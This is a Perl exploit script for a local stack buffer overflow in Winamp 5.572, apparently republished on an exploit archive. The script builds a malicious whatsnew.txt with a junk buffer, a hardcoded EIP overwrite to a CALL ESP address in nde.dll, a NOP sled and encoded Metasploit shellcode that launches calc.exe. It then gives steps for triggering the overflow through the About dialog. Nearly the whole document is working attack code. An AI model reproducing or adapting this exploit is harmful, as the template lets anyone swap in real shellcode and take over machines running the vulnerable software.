Winamp version 5.572 local buffer overflow exploit that executes calc.exe.
1162945d8cffe926d0d36a6ccb59950053d8f8ecb6477b387e268e72cc1e7766# Exploit Title: Winamp 5.572 local buffer overflow
# Date: 25-01-2010
# Author: NeoCortex - PoC by Debug http://www.exploit-db.com/exploits/11248
# Software Link: http://www.exploit-db.com/application/11248
# Version: 5.572
# Tested on: WinXP SP3 De
#!/usr/bin/perl
# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.
print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";
print " __ __________________\n";
print " ________ / \\ / / ____ / ____ / ________\n";
print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n";
print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/ \\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";
my $version = "Winamp 5.572";
my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll
my $nop = "\x90" x 100;
my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";
open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;
print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed